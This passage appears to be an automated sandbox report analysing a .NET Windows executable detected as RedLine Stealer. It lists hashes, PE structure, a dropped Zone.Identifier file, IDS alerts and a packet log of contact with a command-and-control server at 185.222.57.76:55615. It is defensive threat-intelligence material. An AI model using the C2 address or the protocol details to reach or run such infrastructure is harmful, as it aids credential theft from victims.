SSDEEP:	12288:N903IaOq+AuPSunbln1uDTfD3UZ/GiYZ9CCkCmYRZ2kF/o/3LqC:TaQR54D3wGiYZICkCPRZ2D/b
MD5:	9F417A8434A3EA2932B0A23EBAE7E7FA
SHA1:	FCF9B06B8BBD53E0B230C04A99BCC4C8F3BCEC2F
SHA-256:	9632B0C0E242CEF53B06A4E52DD154620184DDED677E0A11BE162278D8352B4E
SHA-512:	8F39DB0EAA84FB61986E2181376D4D50A794D6F6C7AFC700975E32D7EC503FF0975A7292E40B5B04D79C0DB1EE6EFC1CC3682522C8EB453C6D938FA10FE0416E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ng..............0.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........p..,l......]....................................................R.._3...2.W.K......S..-.Xo%..c....... f..'..R..ey..F..65..22{a.rk...4b.._...*.8.@a.j.&...r`...!.......4.9..0._<...R..Z.R..:7..}Z..7.T.:.5........FS{p.-.......N...j\.e..m.. .....;.J..n.6...\GC...%5..R....h..+.QM..V~.+E0)9...........(...B.p.........2.j.v..C..."#l.Fvuy.d9f..@}N..D].n.j..u.......V......;.xv.B..^.!..#.@.....wu...e.B..X1.N.Z~.A..j.1J.I\|.5.....)......1I8..L....[:.,

C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\nzLoHpgAln.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.669667331218024
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	nzLoHpgAln.exe
File size:	646'144 bytes
MD5:	9f417a8434a3ea2932b0a23ebae7e7fa
SHA1:	fcf9b06b8bbd53e0b230c04a99bcc4c8f3bcec2f
SHA256:	9632b0c0e242cef53b06a4e52dd154620184dded677e0a11be162278d8352b4e
SHA512:	8f39db0eaa84fb61986e2181376d4d50a794d6f6c7afc700975e32d7ec503ff0975a7292e40b5b04d79c0db1ee6efc1cc3682522c8eb453c6d938fa10fe0416e
SSDEEP:	12288:N903IaOq+AuPSunbln1uDTfD3UZ/GiYZ9CCkCmYRZ2kF/o/3LqC:TaQR54D3wGiYZICkCPRZ2D/b
TLSH:	65D4F15C3605F50FC4069B314A70EEB455351DEAAA03D303AFDB6EEFB91E9568E042A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ng..............0.................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	1bb3b3b3b3d389b3

Static PE Info

General

Entrypoint:	0x49dd0e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x676E06F9 [Fri Dec 27 01:46:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9dcbc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9e000	0x1990	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9bd14	0x9be00	6bab7f17243dfd83d11975a173b2f7d0	False	0.8837052676423416	data	7.677345826852639	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x9e000	0x1990	0x1a00	ab6e85632f978a89b3eeb36619a926e8	False	0.7931189903846154	data	7.098403241582358	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa0000	0xc	0x200	8a47f2ed0867b7103ec5e46420d75a87	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x9e118	0x151a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8863383931877082
RT_GROUP_ICON	0x9f634	0x14	data	0.9
RT_GROUP_ICON	0x9f648	0x14	data	1.05
RT_VERSION	0x9f65c	0x334	data	0.44390243902439025

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-01T12:32:05.708973+0100	1800000	Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect	1	192.168.2.4	49736	185.222.57.76	55615	TCP
2025-01-01T12:32:05.708973+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.4	49736	185.222.57.76	55615	TCP
2025-01-01T12:32:10.718870+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	185.222.57.76	55615	192.168.2.4	49736	TCP
2025-01-01T12:32:10.927753+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.4	49736	185.222.57.76	55615	TCP
2025-01-01T12:32:13.487839+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	185.222.57.76	55615	192.168.2.4	49736	TCP
2025-01-01T12:32:13.487839+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	185.222.57.76	55615	192.168.2.4	49736	TCP
2025-01-01T12:32:13.891111+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.4	49738	185.222.57.76	55615	TCP
2025-01-01T12:32:14.896477+0100	1800000	Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect	1	192.168.2.4	49739	185.222.57.76	55615	TCP
2025-01-01T12:32:14.896477+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.4	49739	185.222.57.76	55615	TCP
2025-01-01T12:32:15.419091+0100	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.4	49741	185.222.57.76	55615	TCP
2025-01-01T12:32:20.107021+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	185.222.57.76	55615	192.168.2.4	49739	TCP
2025-01-01T12:32:20.318381+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.4	49739	185.222.57.76	55615	TCP
2025-01-01T12:32:23.023775+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	185.222.57.76	55615	192.168.2.4	49739	TCP
2025-01-01T12:32:23.435176+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.4	49748	185.222.57.76	55615	TCP
2025-01-01T12:32:24.903101+0100	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.4	49749	185.222.57.76	55615	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 12:32:05.064333916 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:05.069339037 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:05.069406986 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:05.116972923 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:05.121802092 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:05.474821091 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:05.479685068 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:05.667452097 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:05.708972931 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:10.713932991 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:10.714025021 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:10.718869925 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:10.719001055 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:10.883956909 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:10.927752972 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:10.998672009 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:10.998687029 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:10.998699903 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:10.998709917 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:10.998718977 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:10.998728991 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:10.998750925 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:10.998802900 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.482697010 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.482995987 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.487838984 CET	55615	49736	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.487855911 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.487914085 CET	49736	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.487948895 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.488487005 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.493329048 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.834580898 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.839591026 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.839627981 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.839638948 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.839648008 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.839660883 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.839668036 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.839731932 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.839792013 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.839804888 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.839813948 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.839822054 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.839833021 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.839849949 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.839879990 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.839910984 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.844659090 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.844667912 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.844733000 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.844742060 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.844752073 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.844752073 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.844758987 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.844825983 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.890938997 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.891110897 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.918243885 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.918417931 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.923386097 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923394918 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923441887 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.923472881 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923491955 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923518896 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.923540115 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.923554897 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923584938 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923593998 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923608065 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923638105 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.923672915 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.923681021 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923688889 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923711061 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923719883 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923746109 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.923751116 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923787117 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923793077 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.923839092 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.923877001 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923887014 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923928976 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923937082 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.923979044 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923986912 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.923988104 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.924043894 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.924046040 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.924053907 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.924110889 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.924120903 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.924129009 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.924176931 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.924179077 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.924213886 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.924222946 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.924263954 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.924264908 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.924273968 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.924330950 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928239107 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928267002 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928287983 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928327084 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928368092 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928368092 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928447962 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928458929 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928507090 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928541899 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928550005 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928580046 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928594112 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928628922 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928628922 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928666115 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928682089 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928704023 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928725004 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928755045 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928765059 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928770065 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928807974 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928858995 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928868055 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928875923 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928915977 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.928931952 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928972006 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.928972960 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929016113 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929018974 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929024935 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929069996 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929084063 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929090023 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929117918 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929124117 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929137945 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929171085 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929173946 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929183006 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929227114 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929260015 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929269075 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929296970 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929311991 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929312944 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929326057 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929333925 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929349899 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929364920 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929373026 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929385900 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929409027 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929414034 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929420948 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929425955 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929460049 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929466963 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929496050 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929507017 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929514885 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929526091 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929542065 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929552078 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929560900 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929569006 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929590940 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929600000 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929605007 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929627895 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929636955 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929661989 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929677963 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929692984 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929693937 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929708004 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929718018 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929737091 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929757118 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929766893 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929780960 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929789066 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929807901 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929811954 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929817915 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929826021 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929874897 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929877996 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.929882050 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.929924011 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933177948 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933279037 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933314085 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933324099 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933353901 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933362007 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933384895 CET	49738	55615	192.168.2.4	185.222.57.76
Jan 1, 2025 12:32:13.933398962 CET	55615	49738	185.222.57.76	192.168.2.4
Jan 1, 2025 12:32:13.933398962 CET	49738	55615	192.168.2.4	185.222.57.76
